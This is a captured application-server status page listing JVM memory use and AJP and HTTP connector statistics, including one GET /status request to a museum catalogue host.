JVM

Free memory: 98.51 MB Total memory: 182.50 MB Max memory: 493.06 MB

ajp-0.0.0.0-8009

Max threads: 40 Current thread count: 0 Current thread busy: 0
Max processing time: 0 ms Processing time: 0.0 s Request count: 0 Error count: 0 Bytes received: 0.00 MB Bytes sent: 0.00 MB

Stage | Time | B Sent | B Recv | Client | VHost | Request

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive

http-0.0.0.0-8080

Max threads: 250 Current thread count: 42 Current thread busy: 16
Max processing time: 27510 ms Processing time: 41994.95 s Request count: 62691 Error count: 1387 Bytes received: 2.55 MB Bytes sent: 1872.00 MB

Stage | Time | B Sent | B Recv | Client | VHost | Request
S | 97 ms | 8 KB | 0 KB | 3.235.223.5 | catalogo.museolazarogaldiano.es | GET /status HTTP/1.1

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive